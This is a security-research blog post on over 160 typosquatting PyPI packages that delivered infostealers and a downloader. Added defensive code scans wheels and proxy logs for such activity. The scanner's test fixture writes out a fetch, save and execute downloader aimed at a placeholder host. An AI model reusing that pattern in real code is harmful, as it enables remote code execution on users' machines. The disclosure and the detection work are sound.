PYPI Malware: Over 45K Users Fell Victim To PYPI Packages – Cyble

Misspelled Packages Preying on Unwary Victims

On May 20th, an incident report was released by PyPI administrators that announced the temporary suspension of new user and project name registrations. The reason behind this action is the overwhelming surge in malicious users and projects being created on the PyPI index in the past week.

In this notice, the PyPI administrators mentioned, “The volume of malicious users and malicious projects being created on the index in the past week has outpaced our ability to respond to it in a timely fashion, especially with multiple PyPI administrators on leave.”

PyPI (Python Package Index) is an official third-party software repository for Python. It is a widely used repository for packages developed for the Python programming language. PyPI allows developers to easily access and download pre-built Python packages, saving them time and effort in building code from scratch.

Cyble Research and Intelligence Labs (CRIL) has been actively tracking malicious Python packages, and we recently reported an InfoStealer dubbed KEKW that was spreading through multiple malicious Python packages.

Following PyPI’s notification, we investigated this incident further. During our research, we came across over 160 malicious Python packages. Based on statistics from PePy, these packages had over 45,000 total downloads. We also found a month-over-month increase in downloads of malicious Python packages. All of these packages have since been removed from PyPI, which prevents new infections.

The figure below shows the distribution of the number of packages downloaded in the last three months.

Figure 1 – Number of Unique Malicious Packages Downloaded in a Month

In this blog, we present our comprehensive analysis of more than 160 malicious Python packages. Our research covers various intriguing aspects, including:

  • Misspelled packages employed by adversaries.
  • The proliferation of new malware variants that propagate through malicious packages.
  • Adoption of a new obfuscation technique by the notorious W4SP Stealer.
  • Tactics employed by threat actors who have capitalized on the EvilPIP module.

Analysis

We came across the following malicious Python packages.

colordiscord syssqlite3V2 pyfontslibv2 ovcdtwfcak py2colors
discordcolor syscolourtoolkit pipcoloringliberyV2 jfqyotpnvb  
diskolored syssqlite2toolsV2 pipcolorlibraryV1 mdkjrkjelz  
discolor2 pipcryptov4 pythoncolourlibraryV1 amazonfdndn  
discolorpy pythoncolouringslibV2 pyfores dscripting  
hubtik pysqlite3pkgV2 pyfontslibraryV1 ZHPT1CSCOE  
pywinrequest pyapicolorv2 pipcoloringlibary zyqnuutupjerllnbxaeq  
flaw pythoncryptlibery pipcolorlibV3 uihuihiuhiuhiu  
colorpack pipcryptaddsV2 pyfontslibrary testnetdubled  
TerminalGUI sysdatalib fores azerty123  
pythoncoloringv1 pylibsql pythoncolouringliberyV1 pydistoolhebs  
pipfontingv1 pysqlilibraryV1 pycryptolibary tristanelbg  
pythonfontingv2 syscryptlibV2 pyfontslib zefkopzekfo  
pycolorv3 syssqlite2package proxyscrapertool pipcolor  
pythonfontsv2 pipcolourpackagesV2 forring testlibtaha  
pycolorlib pylibfont pipcryptographylibraryV2 reaquests  
pipsqlimodV1 pythonsqlite2mod pythoncolouringslibV1 pycolorings  
pycolorlibaryV1 pythonsqlitetool initializers pycoloring  
pipcolouringv1 pipsqlpackageV2 totohateinenkleinencock habboapis  
pythoncryptolibrary pipfontingaddonsV2 pyforing color_animated  
pipcolorpkgV1 pythoncryptoaddition foring python2color  
pyfontingtoolsV1 pipcoloringsextV1 testdontdownloadthis ovcdtwfcak  
pycolouringlibrary syssqlitemods forings jfqyotpnvb  
colopym2 syscoloringspkg webhookie mdkjrkjelz  
pipcryptov2 syscryptographymodsV2 hookiweb amazonfdndn  
pipcryptomodsV2 pythoncolorlibV1 skilin3 dscripting  
syscoloringextensionV2 pythonsqlite2toolsV1 ingniodgniodguno ZHPT1CSCOE  
syscolouringsextV1 pythoncryptolibV2 cleanese zyqnuutupjerllnbxaeq  
syssqlitedbextension pycolourkits testiramtikurbu uihuihiuhiuhiu  
syssqlite3liberyV1 pythoncolourv8 gdfgdfgdfgdfg testnetdubled  
pythoncolouringaddsV2 pythoncolorv4 libcrypt azerty123  
pipcolortoolkit pythoncryptov4 pyreqs3 pydistoolhebs  
pyfontingpkgV1 pycoloringv9 colorfy tristanelbg  
pipcolorv2 pythoncryptv10 zeubilamouche zefkopzekfo  
pythoncolouringpkgsV1 pythoncryptov2 pyou pipcolor  
syssqlitelibery pycryptv7 tasksaio testlibtaha  
syscolouringkitsV2 pipcolorv6 taskaio reaquests  
pipcryptoaddonsV2 syscolorv2 libcolors pycolorings  
pipsqlite3extensionV2 pyforings colorlibs pycoloring  
pyfontinglib syssqlite3V2 pypackscate habboapis  

Misspelled Packages

CRIL’s investigation revealed that Threat Actors (TAs) have been uploading misspelled Python packages specifically targeting Python users. One notable example is a malicious package named ‘reaquests’. This deceptive package intentionally mimics a legitimate and widely used Python package called “requests,” a popular tool for performing HTTP requests that is used by millions of users.

The uploading of misspelled packages poses a significant risk, particularly if multiple Threat Actors adopt this technique. Such a strategy can easily lead to the infection of numerous unsuspecting users. Python packages are typically installed using the command “pip install package_name”. In cases where users accidentally mistype the package name, they unknowingly install a malicious Python package, putting themselves at risk of malware infection.

  • reaquests-0.1-py3-none-any
  • Total Downloads: 252

The figure below shows the download statistics for the last 3 months.

Figure 2 – Source PePy

Upon analyzing the aforementioned malicious package, our investigation revealed that it was designed to infect victims with an InfoStealer. This particular type of malware targets users’ Google Chrome web browser and extracts their login credentials. The stolen information is then exfiltrated using a Discord webhook.

Figure 3 – Stealer Code

Malware Variants

Downloader

During our investigation, we identified a series of packages mentioned below that employed an identical downloader. Notably, these packages collectively recorded a total of 1355 downloads.

  • pyou-0.0.1-py3-none-any
  • tasksaio-0.0.1-py3-none-any
  • taskaio-0.0.1-py3-none-any
  • libcolors-0.0.1-py3-none-any
  • colorlibs-0.0.1-py3-none-any
  • pipcolors-0.0.1-py3-none-any
  • pycolorings-0.0.1-py3-none-any

The downloader in question operates by retrieving a remote script from a designated URL and running it through the Python interpreter. To facilitate this process, a temporary file is employed to store and execute the remote script. In this case, the remote content was hosted at “https[:]//paste[.]fo/raw/” and was obfuscated using Hyperion, an open-source Python obfuscator renowned for its ability to apply multiple layers of obfuscation to scripts.

The figure below illustrates the downloader script’s mechanism for fetching the remote content.

Figure 4 – Downloader
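The fetch, temporary file and execute sequence described above can be looked for in a wheel without installing it. The following is an added example, not code from the original report or from the packages it analyzes: it opens a wheel as a zip archive, parses each Python module with the ast module and reports modules that combine all three kinds of call. The call-name lists, the demo_pkg wheel and its placeholder URL are constructed assumptions.

```python
import ast
import io
import zipfile

# Call names grouped by the role they play in a fetch-and-run downloader.
ROLES = {
    "fetch": {"urlopen", "urlretrieve", "urllib.request.urlopen", "requests.get"},
    "tempfile": {"NamedTemporaryFile", "mkstemp",
                 "tempfile.NamedTemporaryFile", "tempfile.mkstemp"},
    "exec": {"exec", "os.system", "subprocess.run", "subprocess.call", "subprocess.Popen"},
}

def dotted_name(node):
    """Turn a Name/Attribute chain such as subprocess.run into 'subprocess.run'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""  # the call target is an expression, e.g. urlopen(...).read
    return ".".join(reversed(parts + [node.id]))

def roles_in_source(source):
    """Return the set of downloader roles whose calls appear in one module."""
    try:
        tree = ast.parse(source)
    except (SyntaxError, ValueError):
        return {"unparseable"}  # worth a manual look, never a match on its own
    names = {dotted_name(n.func) for n in ast.walk(tree) if isinstance(n, ast.Call)}
    return {role for role, known in ROLES.items() if names & known}

def scan_wheel(wheel_bytes):
    """Map each .py member that combines all three roles to its sorted roles."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as wheel:
        for member in wheel.namelist():
            if member.endswith(".py"):
                roles = roles_in_source(wheel.read(member).decode("utf-8", "replace"))
                if set(ROLES) <= roles:
                    hits[member] = sorted(roles)
    return hits

# Constructed fixtures: one module shaped like the downloader, one benign module.
DOWNLOADER_LIKE = '''
import subprocess, sys, tempfile
from urllib.request import urlopen
body = urlopen("https://paste.example.invalid/raw/PLACEHOLDER").read()
with tempfile.NamedTemporaryFile("wb", suffix=".py", delete=False) as fh:
    fh.write(body)
subprocess.run([sys.executable, fh.name])
'''
BENIGN = "import tempfile\nfd, path = tempfile.mkstemp()\n"

def build_sample_wheel():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as wheel:
        wheel.writestr("demo_pkg/__init__.py", DOWNLOADER_LIKE)
        wheel.writestr("demo_pkg/colors.py", BENIGN)
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_wheel(build_sample_wheel()))
```

Matching on call names is a triage aid only: a module that hides its calls behind obfuscation or aliases will not match, and a hit still needs manual review.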

Creal Stealer

The Creal Stealer is an open-source stealer that has been extensively utilized by threat actors (TAs). Although CRIL had previously identified instances of this stealer spreading through phishing sites, there had been no evidence of it being propagated through Python packages. In this analysis, we discovered several Python packages that distribute the Creal Stealer.

Below are a few examples of these packages, which have been downloaded over 1300 times.

  • amazonpxnau-0.0.1-py3-none-any.whl
  • discordcolor-0.0.1-py3-none-any.whl
  • discolorpy-0.0.1-py3-none-any.whl

The figure below shows the Creal Stealer.

Figure 5 – Creal Stealer

TIKCOCK GRABBER

The TIKCOCK GRABBER is a type of Information Stealer malware that focuses on extracting sensitive information from victims’ systems. It specifically targets the Google Chrome browser to steal login credentials and credit card details. To exfiltrate the stolen data, this malware utilizes a Discord Webhook.

The figure below shows the TIKCOCK GRABBER script.

Figure 6 – TIKCOCK GRABBER

We found this grabber in the following package that was downloaded over 100 times:

  • hubtik-1.0-py3-none-any

The figure below shows the download stats for hubtik.

Figure 7 – Source PePy

Hazard Token Grabber

The Hazard Token Grabber is an Information Stealer malware that is available as an open-source project. Initially discovered in 2021, an improved version of this malware was observed by CRIL in 2022. Being openly accessible on GitHub, it has become a popular choice among Threat Actors who use it as a foundation for developing their own variants. While the Hazard Token Grabber is capable of extracting data from various applications, its primary focus appears to be on targeting Discord platform users, owing to its specialized functionality. CRIL has observed instances of this malware strain spreading through several Python packages, which were downloaded over 1000 times.

  • webhookie-0.1-py3-none-any
  • hookiweb-0.1-py3-none-any
  • skilin3-0.1-py3-none-any
  • ingniodgniodguno-0.1-py3-none-any
  • cleanese-0.1-py3-none-any

The figure below shows the Hazard Token Grabber script present in the Python packages.

Figure 8 – Hazard Token Grabber

Updated Obfuscation used in W4SP Stealer

We also found a malicious Python package that was delivering an obfuscated Python stealer.

In the past, the W4SP stealer has been known to spread through malicious Python packages. In our recent research, we discovered a new obfuscation technique employed by the W4SP stealer. The obfuscated code for the stealer is displayed in the figure below.

The following packages were downloaded over 300 times and were spreading W4SP stealer:

  • pypackscate-1.1.2-py3-none-any.whl
  • pypackscate-1.3.0-py3-none-any.whl
  • pypackscate-1.2.0-py3-none-any.whl
  • pypackscate-1.1.3-py3-none-any.whl
  • pypackscate-1.1.1-py3-none-any.whl

Figure 9 – W4SP Stealer

EVILPIP

During our investigation, we encountered a package called “Sintaxiscodigo-0.0.0-py3-none-any” with a download count exceeding 300. Further analysis showed that this package was propagating EvilPIP, an open-source malicious PyPI module. We also found that a module named EvilPIP had itself been uploaded to PyPI and had amassed over 4000 downloads. Since that module has been removed, we no longer have access to its “.whl” file. However, the module’s documentation indicates that the attacker needs to upload it to PyPI for installation on the victim’s system, so we suspect that it was uploaded with the intention of infecting users.

The figure below shows the EvilPIP module present in the Sintaxiscodigo package.

Figure 10 – EVILPIP

The figure below shows the download stats of the EvilPIP module.

Figure 11 – EVILPIP STATS

Conclusion

Malicious Python packages present a significant risk to businesses, as they can be disguised as legitimate software libraries or modules while containing hidden malicious code or backdoors. Once integrated into a business’s software ecosystem, they can have several detrimental effects.

Our analysis revealed that InfoStealers were the type of malware predominantly propagated through malicious Python packages. The presence of readily accessible InfoStealer code on platforms like GitHub has enabled multiple threat actors to use this type of malware in their campaigns.

Additionally, we observed a new technique employed by these TAs to infect users by utilizing malicious Python packages. This technique involved employing deliberately misspelled package names, such that if a user made a typographical error while installing a package, they inadvertently risked infecting their system with malware.

Our Recommendations

  • Before using any Python package, review its source code and ensure it comes from a trusted and reputable source.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and Email attachments without first verifying their authenticity.
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.
  • Block URLs that could be used to spread malware, e.g., Torrent/Warez.
  • Monitor for beaconing at the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
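The stealers in this report exfiltrate data through Discord webhooks, which gives the network-monitoring recommendation above a concrete signal to look for. The following is an added example, not code from the original report: it summarises POST requests to Discord webhook endpoints per source host and marks those sent by Python HTTP clients. It assumes JSON-lines proxy records with full URLs (TLS inspection); the field names and sample records are constructed.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

WEBHOOK_HOSTS = {"discord.com", "discordapp.com", "canary.discord.com", "ptb.discord.com"}
WEBHOOK_PATH = re.compile(r"^/api(?:/v\d+)?/webhooks/\d+/[\w-]+")
# Substrings of the default User-Agent sent by common Python HTTP clients.
SCRIPT_AGENTS = ("python-requests", "python-urllib", "python-httpx", "aiohttp")


def is_webhook_post(record):
    """True when a proxy record is a POST to a Discord webhook endpoint."""
    url = urlsplit(str(record.get("url", "")))
    return (str(record.get("method", "")).upper() == "POST"
            and (url.hostname or "") in WEBHOOK_HOSTS
            and WEBHOOK_PATH.match(url.path) is not None)


def webhook_posts_by_source(log_lines):
    """Summarise webhook POSTs per source host from JSON-lines proxy records."""
    report = defaultdict(lambda: {"posts": 0, "bytes_out": 0, "scripted": False})
    for line in log_lines:
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line: skip it, keep processing
        if not isinstance(record, dict) or not is_webhook_post(record):
            continue
        entry = report[record.get("src", "unknown")]
        entry["posts"] += 1
        entry["bytes_out"] += int(record.get("bytes_out", 0))
        agent = str(record.get("user_agent", "")).lower()
        entry["scripted"] = entry["scripted"] or any(t in agent for t in SCRIPT_AGENTS)
    return dict(report)


# Constructed proxy records (field names are assumptions, token is a placeholder).
_HOOK = "/api/webhooks/123456789012345678/PLACEHOLDER-TOKEN"
SAMPLE_LOG = [json.dumps(r) for r in (
    {"src": "10.0.0.21", "method": "POST", "url": "https://discord.com" + _HOOK,
     "user_agent": "python-requests/2.31.0", "bytes_out": 48211},
    {"src": "10.0.0.21", "method": "POST", "url": "https://discordapp.com" + _HOOK,
     "user_agent": "Python-urllib/3.11", "bytes_out": 1023},
    {"src": "10.0.0.40", "method": "GET", "url": "https://discord.com/channels/@me",
     "user_agent": "Mozilla/5.0", "bytes_out": 310},
    {"src": "10.0.0.40", "method": "POST", "url": "https://upload.pypi.org/legacy/",
     "user_agent": "twine/4.0.2", "bytes_out": 90210},
)] + ['{"src": "10.0.0.50", "method": "POS']

if __name__ == "__main__":
    for src, stats in webhook_posts_by_source(SAMPLE_LOG).items():
        print(src, stats)
```

Legitimate automation also posts to Discord webhooks, so a scripted hit is a lead for triage on that host, not proof of infection.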

MITRE ATT&CK® Techniques

Tactic               Technique ID  Technique Name
Initial Access       T1195         Supply Chain Compromise
Execution            T1204         User Execution
Execution            T1047         Windows Management Instrumentation
Persistence          T1547         Registry Run Keys / Startup Folder
Defense Evasion      T1497         Virtualization/Sandbox Evasion
Defense Evasion      T1562         Disable or Modify Tools
Defense Evasion      T1027         Obfuscated Files or Information
Credential Access    T1056         Credential API Hooking
Discovery            T1057         Process Discovery
Discovery            T1012         Query Registry
Discovery            T1082         System Information Discovery
Discovery            T1083         File and Directory Discovery
Collection           T1005         Data from Local System
Command and Control  T1071         Application Layer Protocol


Disclaimer: The samples (.whl files) utilized for the purpose of this report were obtained from VirusTotal. The download statistics mentioned in this report were collected from PePy.


Source: https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/